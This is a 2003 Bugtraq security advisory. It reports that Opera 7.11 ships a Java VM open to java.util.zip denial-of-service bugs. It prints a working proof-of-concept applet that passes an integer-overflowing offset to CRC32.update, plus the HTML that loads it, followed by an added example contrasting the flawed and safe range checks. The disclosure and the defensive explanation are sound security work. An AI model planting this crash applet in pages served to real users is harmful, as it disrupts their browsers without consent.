Opera 7.11 java.util.zip.* Vulnerability

From: Marc Schoenefeld (schonef_at_uni-muenster.de)
Date: 05/11/03

    Date: Sun, 11 May 2003 01:28:59 +0200 (MES)
    To: bugtraq@securityfocus.com
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Hi,

     The just-released Opera 7.11j comes with a Java VM (1.4.1_01)
     that is vulnerable to the java.util.zip.* bugs
     that can cause denial of service via Java applets
     like the one with source printed below.
     Therefore my suggestion to the Opera deployment
     team is to bundle Java 1.4.1_02, which is not vulnerable
     to the java.util.zip bugs.
     All 1.3.1 versions are still vulnerable!
     If you already installed Java 1.4.1_02 prior to
     installing Opera, you are not vulnerable, because
     the most current JVM seems to be chosen by Opera
     when running applets.
     If you are interested in the details (not Opera-specific),
     read the whole story at www.illegalaccess.org or read:

    http://developer.java.sun.com/developer/bugParade/bugs/4811913.html
    http://developer.java.sun.com/developer/bugParade/bugs/4812181.html
    http://developer.java.sun.com/developer/bugParade/bugs/4812006.html
    http://developer.java.sun.com/developer/bugParade/bugs/4811927.html
    http://developer.java.sun.com/developer/bugParade/bugs/4811917.html

    Sincerely
    Marc Schoenefeld

    The applet code:
    ========CRCApplet.java=======================
    import java.applet.Applet;
    import java.awt.Graphics;

    public class CRCApplet extends Applet {
        public void paint(Graphics g) {
            // Zero-length array with offset Integer.MAX_VALUE-3 and length 4:
            // an out-of-range request passed to CRC32.update().
            (new java.util.zip.CRC32()).update(new byte[0], Integer.MAX_VALUE - 3, 4);
        }
    }
    =============================================

    The corresponding HTML
    =======CRCApplet.html======================
    <html>
    <body>
    <applet code=CRCApplet.class width=400 height=400>
    </applet>
    </body>
    </html>
    ===========================================

    - --

    Never be afraid to try something new. Remember, amateurs built the
    ark; professionals built the Titanic. -- Anonymous

    Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (AIX)
    Comment: For info see http://www.gnupg.org

    iD8DBQE+vYs/qCaQvrKNUNQRAqWUAJ9tdtt9uOboP2fq+/ZqhRqE8Fet7gCfffsD
    nBk6PscPB5WQYpqgZaItaDw=
    =uUS/
    -----END PGP SIGNATURE-----
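
The applet's arguments (offset `Integer.MAX_VALUE-3`, length 4) add up to a value that wraps negative in 32-bit arithmetic. The following is an added example, not part of the original post and not JDK source: it shows why a range check written as `off + len <= length` accepts those arguments while the subtractive form rejects them. The class and method names are hypothetical.

```java
import java.nio.charset.StandardCharsets;
import java.util.zip.CRC32;

public class CrcRangeCheck {
    // Additive check: off + len can wrap past Integer.MAX_VALUE and turn
    // negative, so the final comparison passes for the advisory's arguments.
    static boolean naiveInRange(byte[] b, int off, int len) {
        return off >= 0 && len >= 0 && off + len <= b.length;
    }

    // Subtractive check: once len >= 0 is known, b.length - len cannot overflow.
    static boolean safeInRange(byte[] b, int off, int len) {
        return off >= 0 && len >= 0 && off <= b.length - len;
    }

    // Hypothetical wrapper: validate the range before handing it to CRC32.
    static long checkedCrc(byte[] b, int off, int len) {
        if (!safeInRange(b, off, len)) {
            throw new ArrayIndexOutOfBoundsException(
                "off=" + off + " len=" + len + " length=" + b.length);
        }
        CRC32 crc = new CRC32();
        crc.update(b, off, len);
        return crc.getValue();
    }

    public static void main(String[] args) {
        byte[] empty = new byte[0];
        int off = Integer.MAX_VALUE - 3;  // values taken from the applet above
        int len = 4;

        System.out.println("off + len as int:    " + (off + len));
        System.out.println("naive check accepts: " + naiveInRange(empty, off, len));
        System.out.println("safe check accepts:  " + safeInRange(empty, off, len));

        try {
            checkedCrc(empty, off, len);
        } catch (ArrayIndexOutOfBoundsException e) {
            System.out.println("rejected: " + e.getMessage());
        }

        // Constructed sample input: a valid range still yields a checksum.
        byte[] data = "123456789".getBytes(StandardCharsets.US_ASCII);
        System.out.println("crc32: " + Long.toHexString(checkedCrc(data, 0, data.length)));
    }
}
```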

